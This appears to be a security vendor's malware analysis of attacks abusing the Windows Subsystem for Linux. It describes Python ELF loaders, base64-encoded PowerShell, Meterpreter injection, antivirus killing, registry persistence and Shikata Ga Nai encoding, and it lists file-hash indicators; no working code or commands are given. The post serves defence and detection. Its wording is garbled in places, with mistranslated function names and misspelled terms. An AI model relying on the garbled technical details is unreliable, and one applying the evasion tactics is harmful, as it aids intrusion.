What is WSL?
The Windows subsystem for Linux (WSL) is a resource within the Windows operating system that allows users to run the Linux command line on a machine running the Windows operating system. The Windows subsystem for Linux uses an application called Bash.exe, which launches a Linux dialog box into the Windows operating system interface. It can be considered a “shell” application that runs in Windows.
A new attack chain is underway in which attackers target the WSL environment. The files are written in Python 3 and then converted to an ELF executable for Debian Linux with the help of PineStaller. These files embedded in the sample act as a payload running loader or are retrieved from a remote server and then injected into a running process. This tradecraft can enable an actor to get unobtrusive footing on a compromised machine. There are two variants of the ELF loader: the first is written entirely in Python, while the second uses Python to launch a PowerShell script to make calls to various Windows APIs via ctypes and to perform further actions on the host machine. Some samples include lightweight payloads made with open-source tools, such as meterpreters. In other cases, files try to download shellcode from remote C2.
Figs. 1: Flow diagram
PowerShell is used to inject and execute shellcode in some models, while Python ctypes is used to resolve Windows APIs in others.
In the PowerShell sample, compiled Python code calls three functions –
- Retro ()
- kill_av ()
- windowspersistance ()
The Retro () The function contains the PowerShell payload which is encoded using multilevel base 64 encoding. Decoded PowerShell uses MSF Venom Payload.
In an infinite, true loop, when Retro () The function uses a subprocess to execute a Base64-encoded PowerShell script every 20 seconds, blocking any other process from being executed.
The kill_av () The name of the function does what it means: uses it os.popen Try to kill suspicious AV products and analysis tools ().
The WindowsSparse () The function creates a registry run key for stability using a subprocess, copying the original ELF file to an app data subdirectory called payload.exe.
The meterpreter payload provides an interactive shell from which the attacker can explore the target machine and execute the code. Meterpressors are deployed using in-memory DLL injection. As a result, the Meterpreter stays completely in memory and writes nothing to disk.
So here, in this case the Meterpreter payload is injected into the Apache HTTP Server Benchmarking Tool (ab.exe) using MSF Venom.
The figure above shows the meterporter payload.
The image above shows that it tries to connect to the C2 server for further interaction, but fails and exits.
Since the IP is not active, it is unable to connect to the server and so we were not able to trace further activity.
According to the static analysis shown in the figure above, after connecting to the server, it receives some data for which it virtually allocates memory and then continues to receive data in a loop until it is zero. This frees up the memory that is allocated and closes the socket and then exits it.
Also found are some other IOCs that communicate with the same IP address. These samples are from the Telegram desktop setup, which has a meterporter payload and the payload is obscured with the Shikata Ga Nai (SGN) encoder.
SGN is a polymorphic XOR coupling response encoder. In the case of XOR addition feedback, the algorithm is to XOR future instructions with a random key and then add that instruction to the key to reuse to encode the next instruction. To decode the shellcode, the steps have to be followed in reverse.
This encoder allows multiple repetitions. Here, in this case, it encoded payload five times
After decoding we get the final meterporter payload as shown below.
The next activity of this payload is the same as above.
Conclusion
We recommend that users who have enabled WSL ensure proper logging to prevent themselves from such attacks as threat actors try to use this new feature of the operating system. Quickheal protects its users by identifying them with the names ELF.Trojan.44270.GC and Trojan.Swrort detection
Compromise Indicators (IOCs):
ELF IoCs:
- 53854c6d163bfd0c56d8b297ac43bd25c21f696de6063031241e792ee65df441 ELF.Trojan.44270.GC
- c297e545b8f150cc5ff56dbb68dc74fe30a421d9d40f38f4a53083192697c44c ELF.Trojan.44270.GC
- 17921368901f23e0cad0d2fe4ce5694aebaf4727699ed0358117500701914d1b ELF.Trojan.44270.GC
- 198a2d42df010d838b4207f478d885ef36e3db13b1744d673e221b828c28bf77 ELF.Trojan.44270.GC
PE IoCs:
- 85acfee86fd742ac5b6e347cd860324b: Trojan.Swrort.S23689749
- F15ef7b1c22aa23fa5de99980501b2dc: Trojan.Swrort.S23689749
- C21e299905613e5cd5d79432934e47e3: Trojan.Swrort.S23689749
- Ae094056a41854ab04409c6f791194df: Trojan.Swrort.A
Subject matter experts:
- Rahul Pawar, Security Researcher I.
- Rutuja means, security researcher I.
